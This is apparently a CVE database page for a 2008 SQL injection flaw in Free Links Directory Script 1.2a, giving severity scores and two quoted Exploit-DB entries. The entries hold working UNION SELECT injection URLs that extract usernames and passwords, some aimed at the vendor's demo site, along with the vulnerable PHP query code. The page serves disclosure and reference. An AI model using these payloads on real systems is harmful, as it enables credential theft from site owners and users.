CVE-2008-5779
published 2008-12-30CVE-2008-5779: SQL injection vulnerability in lpro.php in Free Links Directory Script (FLDS) 1.2a allows remote attackers to execute arbitrary SQL commands via the id…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.03%
59.5th percentile
SQL injection vulnerability in lpro.php in Free Links Directory Script (FLDS) 1.2a allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flds_script | flds | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FLDS 1.2a - 'lpro.php' SQL Injection
exploitdb·2008-12-15
CVE-2008-5779 FLDS 1.2a - 'lpro.php' SQL Injection
FLDS 1.2a - 'lpro.php' SQL Injection
---
#Free Links Directory Script (id) SQL Injection Vulnerability
#Author: nuclear
#site:
http://flds-script.com
#vuln:
http://localhost/[path]/lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users
#demo:
http://flds-script.com/demo/lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users
#notes:
Script is full of bugs like this, too bored to catch em all !
#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
# milw0rm.com [2008-12-15]
Exploit-DB
FLDS 1.2a - 'redir.php' SQL Injection
exploitdb·2008-12-14
CVE-2008-5928 FLDS 1.2a - 'redir.php' SQL Injection
FLDS 1.2a - 'redir.php' SQL Injection
---
#Free Links Directory Script (id) SQL Injection Vulnerability
#Author: nuclear
#site:
http://flds-script.com
#vuln:
http://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/*
#vulnerable code:
$ida = $_GET['id'];
$link = mysql_fetch_array(mysql_query("select * from links where id=$ida"));
$idcheck = mysql_numrows(mysql_query("select * from links where id=$ida"));
#demo:
http://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11
#notes:
the injection does not work if trying to comment out the rest of the query.The result page will be a 404 but
you can get the data of the injection in the url
#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys3
No writeups or analysis indexed.
http://osvdb.org/50723http://secunia.com/advisories/33075http://securityreason.com/securityalert/4849http://www.securityfocus.com/bid/32835https://www.exploit-db.com/exploits/7474http://osvdb.org/50723http://secunia.com/advisories/33075http://securityreason.com/securityalert/4849http://www.securityfocus.com/bid/32835https://www.exploit-db.com/exploits/7474
2008-12-30
Published